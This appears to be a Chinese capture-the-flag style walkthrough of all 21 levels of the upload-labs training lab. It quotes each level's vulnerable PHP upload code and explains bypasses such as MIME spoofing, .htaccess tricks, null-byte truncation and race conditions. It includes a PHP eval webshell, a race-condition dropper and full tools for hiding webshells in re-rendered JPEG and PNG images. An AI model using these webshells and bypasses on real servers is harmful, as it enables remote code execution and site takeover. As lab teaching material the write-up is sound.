當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

upload-labs--wp（21关）

發布時間：2023/12/31 编程问答 28 豆豆

生活随笔收集整理的這篇文章主要介紹了 upload-labs--wp（21关）小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

文章目錄

- 第一題
- 第二題
- 第三題
- 第四題
- 第五題
- 第六題
- 第七題
- 第八題
- 第九題
- 第十題
- 第十一題
- 第十二題
- 第十三題
- 第十四題
- 第十五題
- 第十六題
- 第十七題
- 第十八題
- 第十九題
- 第二十題
- 第二一關

環境鏈接： https://github.com/c0ny1/upload-labs
新增了一個第五題，其它序號依次后延，所以現在一共有21題

第一題

不多說，直接上傳

出現上圖所示，如果你bp開啟著抓包，你會發現，并沒有抓到任何數據包，就被攔截了，這說明是前端驗證沒禁用js或修改前端代碼即可

隨后可以訪問xx.php，url利用或C刀/蟻劍皆可

最后加個源碼分析吧：

第二題

$is_upload = false; $msg = null; if (isset($_POST['submit'])) {if (file_exists($UPLOAD_ADDR)) {if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {$img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];$is_upload = true;}} else {$msg = '文件類型不正確，請重新上傳！';}} else {$msg = $UPLOAD_ADDR.'文件夾不存在,請手工創建！';} }

MIMIE類型驗證，只允許type==‘image/jpeg’ || ‘image/png’ || ‘image/gif’
思路1：直接上傳xx.php，然后bp截斷，修改content-type類型
思路2：將webshell后綴修改為.jpg上傳，然后bp截斷，再將后綴修改為.php

第三題

$is_upload = false; $msg = null; if (isset($_POST['submit'])) {if (file_exists($UPLOAD_ADDR)) {$deny_ext = array('.asp','.aspx','.php','.jsp');$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//刪除文件名末尾的點$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //轉換為小寫$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //收尾去空if(!in_array($file_ext, $deny_ext)) {if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR. '/' . $_FILES['upload_file']['name'])) {$img_path = $UPLOAD_ADDR .'/'. $_FILES['upload_file']['name'];$is_upload = true;}} else {$msg = '不允許上傳.asp,.aspx,.php,.jsp后綴文件！';}} else {$msg = $UPLOAD_ADDR . '文件夾不存在,請手工創建！';} }

黑名單過濾
思路：可以嘗試上傳php2/php3/php4/php5/phtml繞過，我這里上傳phtml
為什么可以解析phtml5呢？可以在httpd-conf的文件中搜索AddType application/x-httpd-php（它指定可以解析哪些后綴的文件名，我使用的是phpstudy2018，另外需要注意的是前面有#表示未開啟該配置，刪除后，還需要重啟apache服務）
其他語言擴展名繞過：

第四題

$is_upload = false; $msg = null; if (isset($_POST['submit'])) {if (file_exists($UPLOAD_ADDR)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//刪除文件名末尾的點$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //轉換為小寫$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //收尾去空if (!in_array($file_ext, $deny_ext)) {if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {$img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];$is_upload = true;}} else {$msg = '此文件不允許上傳!';}} else {$msg = $UPLOAD_ADDR . '文件夾不存在,請手工創建！';} }

幾乎過濾了所有的后綴名，出了.htaccess
思路：上傳.htaccess文件，文件內容：SetHandler application/x-httpd-php，這行配置表示將所有后綴名都解析為php；如果想要指定后綴名解析為php，文件內容：AddType application/x-httpd-php .jpg

第五題

$is_upload = false; $msg = null; if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//刪除文件名末尾的點$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //轉換為小寫$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上傳出錯！';}} else {$msg = '此文件類型不允許上傳！';}} else {$msg = UPLOAD_PATH . '文件夾不存在,請手工創建！';} }

新增的第五題在第四題的基礎上加強了黑名單繞過，不能上傳.htaccess文件了，我們可以使用x.php. .進行繞過，方法和第十題一樣

第六題

$is_upload = false; $msg = null; if (isset($_POST['submit'])) {if (file_exists($UPLOAD_ADDR)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//刪除文件名末尾的點$file_ext = strrchr($file_name, '.');$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {$img_path = $UPLOAD_ADDR . '/' . $file_name;$is_upload = true;}} else {$msg = '此文件不允許上傳';}} else {$msg = $UPLOAD_ADDR . '文件夾不存在,請手工創建！';} }

后綴名大小寫繞過

第七題

$is_upload = false; $msg = null; if (isset($_POST['submit'])) {if (file_exists($UPLOAD_ADDR)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = $_FILES['upload_file']['name'];$file_name = deldot($file_name);//刪除文件名末尾的點$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //轉換為小寫$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATAif (!in_array($file_ext, $deny_ext)) {if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {$img_path = $UPLOAD_ADDR . '/' . $file_name;$is_upload = true;}} else {$msg = '此文件不允許上傳';}} else {$msg = $UPLOAD_ADDR . '文件夾不存在,請手工創建！';} }

還是黑名單，但沒有對后綴名進行去空處理，可以使用空格繞過
思路：上傳文件例如xx.php ，注意，php后面有一個空格，另外本地文件名是不能有空格的，使用bp改
原理就是，上傳的xx.php ，黑名單沒有，所以無法過濾，然后當傳到目標服務器后，目標服務器如果是windows，便會自動去空，又變成xx.php

第八題

$is_upload = false; $msg = null; if (isset($_POST['submit'])) {if (file_exists($UPLOAD_ADDR)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //轉換為小寫$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {$img_path = $UPLOAD_ADDR . '/' . $file_name;$is_upload = true;}} else {$msg = '此文件不允許上傳';}} else {$msg = $UPLOAD_ADDR . '文件夾不存在,請手工創建！';} }

思路：同第六題一樣，利用windows的特性，會自動去掉.，利用xx.php.進行繞過

第九題

$is_upload = false; $msg = null; if (isset($_POST['submit'])) {if (file_exists($UPLOAD_ADDR)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//刪除文件名末尾的點$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //轉換為小寫$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {$img_path = $UPLOAD_ADDR . '/' . $file_name;$is_upload = true;}} else {$msg = '此文件不允許上傳';}} else {$msg = $UPLOAD_ADDR . '文件夾不存在,請手工創建！';} }

思路：同第六題一樣，利用windows的特性，這里黑名單沒有過濾::$DATA，因此上傳xx.php::$DATA，上傳成功后windows會自動去除::$DATA

第十題

$is_upload = false; $msg = null; if (isset($_POST['submit'])) {if (file_exists($UPLOAD_ADDR)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//刪除文件名末尾的點$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //轉換為小寫$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {$img_path = $UPLOAD_ADDR . '/' . $file_name;//../upload/$filename$is_upload = true;}} else {$msg = '此文件不允許上傳';}} else {$msg = $UPLOAD_ADDR . '文件夾不存在,請手工創建！';} }

$filename只進行了去空和刪除文件末尾的點
思路：上傳xx.php. .

構造思路： xx.php. .不在$deny_ext中首尾去空后為xx.php. . 去掉文件末尾的..后為xx.php. move_uploaded_file后為../upload/xx.php. $img_path=../upload/xx.php.,這個其實也沒用 deldot函數分析： function deldot($s){//$s="xx.php. ."for($i = strlen($s)-1;$i>0;$i--){//$i=8;$i>0;循環一次后$i才會等于7//$i=8;$i>0;循環一次后才會變為6$c = substr($s,$i,1);//$c=最后一個.//$c=空格if($i == strlen($s)-1 and $c != '.'){//8==8 and .!=.，不執行//7==8 and .!=空格，不執行return $s;}if($c != '.'){//.!=.，不執行//空格!=.，執行$i=7return substr($s,0,$i+1);//return xx.php.空格，需要注意的是,substr第三個參數是表示長度}} }

最后上傳到目標服務器的就是xx.php.，由于windows的特性，就變為xx.php

第十一題

$is_upload = false; $msg = null; if (isset($_POST['submit'])) {if (file_exists($UPLOAD_ADDR)) {$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = str_ireplace($deny_ext,"", $file_name);if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $file_name)) {$img_path = $UPLOAD_ADDR . '/' .$file_name;$is_upload = true;}} else {$msg = $UPLOAD_ADDR . '文件夾不存在,請手工創建！';} }

思路：后綴名雙寫繞過，例如，xx.pphphp
注意：str_ireplace函數是從將字符串從左到右搜索，先搜到誰就替換誰，類似xx.phphpp就不行，因為替換后會變為xx.hpp

第十二題

前提：該題需要magic_quotes_gpc=off、php版本要小于5.3.4，5.3.4及以上已經修復該問題

$is_upload = false; $msg = null; if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;}else{$msg = '上傳失敗！';}}else{$msg = "只允許上傳.jpg|.png|.gif類型文件！";} }

思路：因為$img_path是拼接而成，所以直接使用%00截斷后面的內容，因此，先上傳xx.jpg，再使用bp截斷

因為xx3.php后面被截斷，所以我們直接訪問xx3.php即可

第十三題

$is_upload = false; $msg = null; if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;}else{$msg = "上傳失敗";}}else{$msg = "只允許上傳.jpg|.png|.gif類型文件！";} }

思路：這題和第十一題差不多，但這題的$img_path是通過POST進行拼接，因此，我們需要在POST中使用00截斷（也就是空字符截斷）
這里將%00進行url decode，轉換為空字符，進行截斷（GET可以url自動轉碼的，但POST不會）

也可以使用Hex進行截斷，在p后面添加一個空字符（00），p的16進制是0x70

第十四題

思路：上傳圖片馬，制作：copy x.jpg/b + x.php/a xx.jpg，上傳后需要結合文件包含漏洞利用，或者目標服務器支持以php解析.jpg后綴，這里需要注意的是圖片馬中的一句話能寫到中間盡量寫到中間，真實環境不容易被發現，可用winhex或bp修改
copy使用注意事項：圖片一定要在copy后面，否則創建出來的木馬圖片有可能無法顯示，例如，copy x.php/a + x.gif/b xx.gif，xx.gif就無法顯示

第十五題

思路：這里只能上傳.jpeg|.gif|.png，我jpeg反正傳不去，頭文件也對，就是不行，gif和png可以
主要函數：getimagesize、image_type_to_extension、stripos，最后就是要return $ext才行
常見圖片頭文件：

JPEG (jpg)，文件頭hex：FF D8 FF PNG (png)，文件頭hex：89 50 4E 47 GIF (gif)，文件頭hex：47 49 46 38（也就是GIF89a）

第十六題

前提：需要開啟php_exif擴展，php版本>5.2.17

思路：php_exif模塊來判斷文件類型，依舊可以使用圖片馬繞過

第十七題

$is_upload = false; $msg = null; if (isset($_POST['submit'])){// 獲得上傳文件的基本信息，文件名，類型，大小，臨時文件路徑$filename = $_FILES['upload_file']['name'];$filetype = $_FILES['upload_file']['type'];$tmpname = $_FILES['upload_file']['tmp_name'];$target_path=$UPLOAD_ADDR.basename($filename);// 獲得上傳文件的擴展名$fileext= substr(strrchr($filename,"."),1);//判斷文件后綴與類型，合法才進行上傳操作if(($fileext == "jpg") && ($filetype=="image/jpeg")){if(move_uploaded_file($tmpname,$target_path)){//使用上傳的圖片生成新的圖片$im = imagecreatefromjpeg($target_path);if($im == false){$msg = "該文件不是jpg格式的圖片！";}else{//給新圖片指定文件名srand(time());$newfilename = strval(rand()).".jpg";$newimagepath = $UPLOAD_ADDR.$newfilename;imagejpeg($im,$newimagepath);//顯示二次渲染后的圖片（使用用戶上傳圖片生成的新圖片）$img_path = $UPLOAD_ADDR.$newfilename;unlink($target_path);$is_upload = true;}}else{$msg = "上傳失敗！";}}else if(($fileext == "png") && ($filetype=="image/png")){if(move_uploaded_file($tmpname,$target_path)){//使用上傳的圖片生成新的圖片$im = imagecreatefrompng($target_path);if($im == false){$msg = "該文件不是png格式的圖片！";}else{//給新圖片指定文件名srand(time());$newfilename = strval(rand()).".png";$newimagepath = $UPLOAD_ADDR.$newfilename;imagepng($im,$newimagepath);//顯示二次渲染后的圖片（使用用戶上傳圖片生成的新圖片）$img_path = $UPLOAD_ADDR.$newfilename;unlink($target_path);$is_upload = true; }}else{$msg = "上傳失敗！";}}else if(($fileext == "gif") && ($filetype=="image/gif")){if(move_uploaded_file($tmpname,$target_path)){//使用上傳的圖片生成新的圖片$im = imagecreatefromgif($target_path);if($im == false){$msg = "該文件不是gif格式的圖片！";}else{//給新圖片指定文件名srand(time());$newfilename = strval(rand()).".gif";$newimagepath = $UPLOAD_ADDR.$newfilename;imagegif($im,$newimagepath);//顯示二次渲染后的圖片（使用用戶上傳圖片生成的新圖片）$img_path = $UPLOAD_ADDR.$newfilename;unlink($target_path);$is_upload = true;}}else{$msg = "上傳失敗！";}}else{$msg = "只允許上傳后綴為.jpg|.png|.gif的圖片文件！";} }

判斷了后綴名、content-type，imagecreatefromgif判斷是否為gif圖片，最后使用imagegif做一次二次渲染
思路：由此可見，只能上傳.gif文件，可以使用圖片馬繞過

（1）二次渲染，最好制作的圖片馬就是.gif，比較渲染前后沒有改變的部分，在沒改變的這部分添加一句話
獲得二次渲染gif代碼：

<?php $newgif = imagecreatefromgif('D:\phpStudy\PHPTutorial\WWW\upload-labs\upload\x.gif'); imagegif($newgif,'D:\phpStudy\PHPTutorial\WWW\upload-labs\upload\x1.gif'); ?>

之后就可以使用winhex進行對比，然后在沒刪減的地方添加一句話

（2）png的二次渲染，直接用的國外大牛的代碼，生成二次渲染后不會刪除一句話的png
具體制作，可參考https://xz.aliyun.com/t/2657

<?php $p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,0x66, 0x44, 0x50, 0x33);$img = imagecreatetruecolor(32, 32);for ($y = 0; $y < sizeof($p); $y += 3) {$r = $p[$y];$g = $p[$y+1];$b = $p[$y+2];$color = imagecolorallocate($img, $r, $g, $b);imagesetpixel($img, round($y / 3), 0, $color); }imagepng($img,'./1.png'); ?>

注意生成后的后門使用的時短標簽，服務器需要開啟short_open_tag = On

利用：有時使用eval不行，就換assert

jpg/jpeg繞過二次渲染的payload，也是國外大牛寫的jpg_payload.php

<?php/*The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().It is necessary that the size and quality of the initial image are the same as those of the processed image.1) Upload an arbitrary image via secured files upload script2) Save the processed image and launch:jpg_payload.php <jpg_name.jpg>In case of successful injection you will get a specially crafted image, which should be uploaded again.Since the most straightforward injection method is used, the following problems can occur:1) After the second processing the injected data may become partially corrupted.2) The jpg_payload.php script outputs "Something's wrong".If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.Sergey Bobrov @Black2Fan.See also:https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/*/$miniPayload = '<?php @eval($_REQUEST[peak]);?>';if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {die('php-gd is not installed');}if(!isset($argv[1])) {die('php jpg_payload.php <jpg_name.jpg>');}set_error_handler("custom_error_handler");for($pad = 0; $pad < 1024; $pad++) {$nullbytePayloadSize = $pad;$dis = new DataInputStream($argv[1]);$outStream = file_get_contents($argv[1]);$extraBytes = 0;$correctImage = TRUE;if($dis->readShort() != 0xFFD8) {die('Incorrect SOI marker');}while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {$marker = $dis->readByte();$size = $dis->readShort() - 2;$dis->skip($size);if($marker === 0xDA) {$startPos = $dis->seek();$outStreamTmp = substr($outStream, 0, $startPos) . $miniPayload . str_repeat("\0",$nullbytePayloadSize) . substr($outStream, $startPos);checkImage('_'.$argv[1], $outStreamTmp, TRUE);if($extraBytes !== 0) {while((!$dis->eof())) {if($dis->readByte() === 0xFF) {if($dis->readByte !== 0x00) {break;}}}$stopPos = $dis->seek() - 2;$imageStreamSize = $stopPos - $startPos;$outStream = substr($outStream, 0, $startPos) . $miniPayload . substr(str_repeat("\0",$nullbytePayloadSize).substr($outStream, $startPos, $imageStreamSize),0,$nullbytePayloadSize+$imageStreamSize-$extraBytes) . substr($outStream, $stopPos);} elseif($correctImage) {$outStream = $outStreamTmp;} else {break;}if(checkImage('payload_'.$argv[1], $outStream)) {die('Success!');} else {break;}}}}unlink('payload_'.$argv[1]);die('Something\'s wrong');function checkImage($filename, $data, $unlink = FALSE) {global $correctImage;file_put_contents($filename, $data);$correctImage = TRUE;imagecreatefromjpeg($filename);if($unlink)unlink($filename);return $correctImage;}function custom_error_handler($errno, $errstr, $errfile, $errline) {global $extraBytes, $correctImage;$correctImage = FALSE;if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {if(isset($m[1])) {$extraBytes = (int)$m[1];}}}class DataInputStream {private $binData;private $order;private $size;public function __construct($filename, $order = false, $fromString = false) {$this->binData = '';$this->order = $order;if(!$fromString) {if(!file_exists($filename) || !is_file($filename))die('File not exists ['.$filename.']');$this->binData = file_get_contents($filename);} else {$this->binData = $filename;}$this->size = strlen($this->binData);}public function seek() {return ($this->size - strlen($this->binData));}public function skip($skip) {$this->binData = substr($this->binData, $skip);}public function readByte() {if($this->eof()) {die('End Of File');}$byte = substr($this->binData, 0, 1);$this->binData = substr($this->binData, 1);return ord($byte);}public function readShort() {if(strlen($this->binData) < 2) {die('End Of File');}$short = substr($this->binData, 0, 2);$this->binData = substr($this->binData, 2);if($this->order) {$short = (ord($short[1]) << 8) + ord($short[0]);} else {$short = (ord($short[0]) << 8) + ord($short[1]);}return $short;}public function eof() {return !$this->binData||(strlen($this->binData) === 0);}} ?>

準備好jpg圖片，再使用php執行該代碼：php jpg_payload.php x1.jpg，注意jpg_payload_payload.php和1.jpg最好在同一目錄下，不然有可能會出現Something’s wrong

或

皆可

第十八題

$is_upload = false; $msg = null;if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_name = $_FILES['upload_file']['name'];$temp_file = $_FILES['upload_file']['tmp_name'];$file_ext = substr($file_name,strrpos($file_name,".")+1);$upload_file = $UPLOAD_ADDR . '/' . $file_name;if(move_uploaded_file($temp_file, $upload_file)){if(in_array($file_ext,$ext_arr)){$img_path = $UPLOAD_ADDR . '/'. rand(10, 99).date("YmdHis").".".$file_ext;rename($upload_file, $img_path);$is_upload = true;}else{$msg = "只允許上傳.jpg|.png|.gif類型文件！";unlink($upload_file);}}else{$msg = '上傳失敗！';} }

思路：rename修改名稱，unlink刪除文件，我們在他刪除之前再次上傳，使用條件競爭
生成一句話的代碼：<?php fputs(fopen('shell.php','w'),'<?php @eval($_REQUEST[peak]);?>');?>
使用bp Intruder無限次上傳2.php

設置線程后，start

無限次訪問2.php木馬文件

設置線程后，start

第十九題

//index.php $is_upload = false; $msg = null; if (isset($_POST['submit'])) {require_once("./myupload.php");$imgFileName =time();$u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);$status_code = $u->upload($UPLOAD_ADDR);switch ($status_code) {case 1:$is_upload = true;$img_path = $u->cls_upload_dir . $u->cls_file_rename_to;break;case 2:$msg = '文件已經被上傳，但沒有重命名。';break; case -1:$msg = '這個文件不能上傳到服務器的臨時文件存儲目錄。';break; case -2:$msg = '上傳失敗，上傳目錄不可寫。';break; case -3:$msg = '上傳失敗，無法上傳該類型文件。';break; case -4:$msg = '上傳失敗，上傳的文件過大。';break; case -5:$msg = '上傳失敗，服務器已經存在相同名稱文件。';break; case -6:$msg = '文件無法上傳，文件不能復制到目標目錄。';break; default:$msg = '未知錯誤！';break;} }//myupload.php class MyUpload{ ...... ...... ...... var $cls_arr_ext_accepted = array(".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",".html", ".xml", ".tiff", ".jpeg", ".png" );...... ...... ...... /** upload()**** Method to upload the file.** This is the only method to call outside the class.** @para String name of directory we upload to** @returns void**/function upload( $dir ){$ret = $this->isUploadedFile();if( $ret != 1 ){return $this->resultUpload( $ret );}$ret = $this->setDir( $dir );if( $ret != 1 ){return $this->resultUpload( $ret );}$ret = $this->checkExtension();if( $ret != 1 ){return $this->resultUpload( $ret );}$ret = $this->checkSize();if( $ret != 1 ){return $this->resultUpload( $ret ); }// if flag to check if the file exists is set to 1if( $this->cls_file_exists == 1 ){$ret = $this->checkFileExists();if( $ret != 1 ){return $this->resultUpload( $ret ); }}// if we are here, we are ready to move the file to destination$ret = $this->move();if( $ret != 1 ){return $this->resultUpload( $ret ); }// check if we need to rename the fileif( $this->cls_rename_file == 1 ){$ret = $this->renameFile();if( $ret != 1 ){return $this->resultUpload( $ret ); }}// if we are here, everything worked as planned :)return $this->resultUpload( "SUCCESS" );} ...... ...... ...... };

思路：源碼是將先將上傳的文件保存（move函數），再rename重命名一下，這里需要和文件包含配合使用

上傳22.jpg文件

接下來使用條件競爭，讓服務器來不及重命名，使用方法和第十七題一樣

第二十題

$is_upload = false; $msg = null; if (isset($_POST['submit'])) {if (file_exists($UPLOAD_ADDR)) {$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");$file_name = $_POST['save_name'];$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);if(!in_array($file_ext,$deny_ext)) {$img_path = $UPLOAD_ADDR . '/' .$file_name;if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path)) { $is_upload = true;}else{$msg = '上傳失敗！';}}else{$msg = '禁止保存為該類型文件！';}} else {$msg = $UPLOAD_ADDR . '文件夾不存在,請手工創建！';} }

思路：可以使用00截斷，還可以利用move_upload_file函數的漏洞，會忽略文件末尾的/.

或

第二一關

$is_upload = false; $msg = null; if(!empty($_FILES['upload_file'])){//檢查MIME$allow_type = array('image/jpeg','image/png','image/gif');if(!in_array($_FILES['upload_file']['type'],$allow_type)){$msg = "禁止上傳該類型文件!";}else{//檢查文件名$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];if (!is_array($file)) {$file = explode('.', strtolower($file));}$ext = end($file);$allow_suffix = array('jpg','png','gif');if (!in_array($ext, $allow_suffix)) {$msg = "禁止上傳該后綴文件!";}else{$file_name = reset($file) . '.' . $file[count($file) - 1];$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH . '/' .$file_name;if (move_uploaded_file($temp_file, $img_path)) {$msg = "文件上傳成功！";$is_upload = true;} else {$msg = "文件上傳失敗！";}}} }else{$msg = "請選擇要上傳的文件！"; }

思路：上傳數組后，重定義文件路徑，可以使用數組+/.繞過
payload

注意：該題上傳x.php后，需要將MIME類型修改下，還需要注意xx.php/后面沒有.，第三個框中只能是jpg/gif/png，前面不能有.，因為有array數組白名單驗證

參考：
https://xz.aliyun.com/t/2435（19關）
https://xz.aliyun.com/t/4029#toc-20（20關）
https://zhuanlan.zhihu.com/p/52099683（19關）
https://www.jianshu.com/p/aabc1e7408d5（20關）

總結

以上是生活随笔為你收集整理的upload-labs--wp（21关）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇：刚用一个月的 iPhone 电池寿命就开
下一篇： sqli-labs过关笔记（Page-1